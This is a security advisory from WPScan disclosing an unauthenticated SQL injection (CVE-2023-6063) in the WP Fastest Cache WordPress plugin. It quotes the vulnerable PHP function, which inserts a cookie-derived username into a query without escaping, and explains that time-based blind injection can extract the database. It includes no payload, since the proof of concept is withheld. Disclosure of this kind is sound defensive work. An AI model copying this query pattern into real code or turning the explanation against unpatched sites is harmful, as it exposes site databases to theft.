During an internal review of the WP Fastest Cache plugin, the WPScan team discovered a serious SQL injection vulnerability. This vulnerability may allow unauthenticated attackers to read the full contents of the WordPress database using a time‑based blind SQL injection payload.
Upon discovering the vulnerability, we promptly alerted the plugin development team, who released version 1.2.2
to fix the issue. It is crucial for administrators to ensure their WordPress installations are fully updated to safeguard against this vulnerability.
Unauthenticated SQL Injection
Plugin Name | WP Fastest Cache |
Plugin URL | https://wordpress.org/plugins/wp-fastest-cache/ |
Author | https://www.wpfastestcache.com |
Affected Versions | Versions lower than 1.2.2 |
CVE ID | 2023-6063 |
WPScan ID | 30a74105-8ade-4198-abe2-1c6f2967443e |
CVSSv3.1 | 8.6 |
The is_user_admin
function of the WpFastestCacheCreateCache
class is vulnerable to SQL Injection. The function is called from the createCache
function.
public function is_user_admin(){
global $wpdb;
foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
if(preg_match("/wordpress_logged_in/i", $cookie_key)){
$username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
break;
}
}
if(isset($username) && $username){
$res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
FROM `$wpdb->users`
INNER JOIN `$wpdb->usermeta`
ON `$wpdb->users`.`user_login` = \"$username\" AND
`$wpdb->usermeta`.`meta_key` LIKE \"%_user_level\" AND
`$wpdb->usermeta`.`meta_value` = \"10\" AND
`$wpdb->users`.`ID` = `$wpdb->usermeta`.user_id ;"
);
return $res;
}
return false;
}
The function retrieves the $username
variable from any cookie with the text wordpress_logged_in
in its name, retrieving everything up to the first |
character. The variable is then inserted into the query without escaping. Note that this function is called at plugin load time, which is before wp_magic_quotes()
has been called on the request data.
Since the results from the SQL query are not used anywhere outside of this function, there is no direct way to retrieve them. However, a time‑based blind SQL injection payload can easily extract any information from the database using this vulnerability.
The proof‑of‑concept for this vulnerability will be available in the WPScan entry for the vulnerability on Nov. 27, 2023.
Credits
Original researcher: Alex Sanford
Many thanks to the rest of the WPScan team for their invaluable feedback, assistance, and corrections.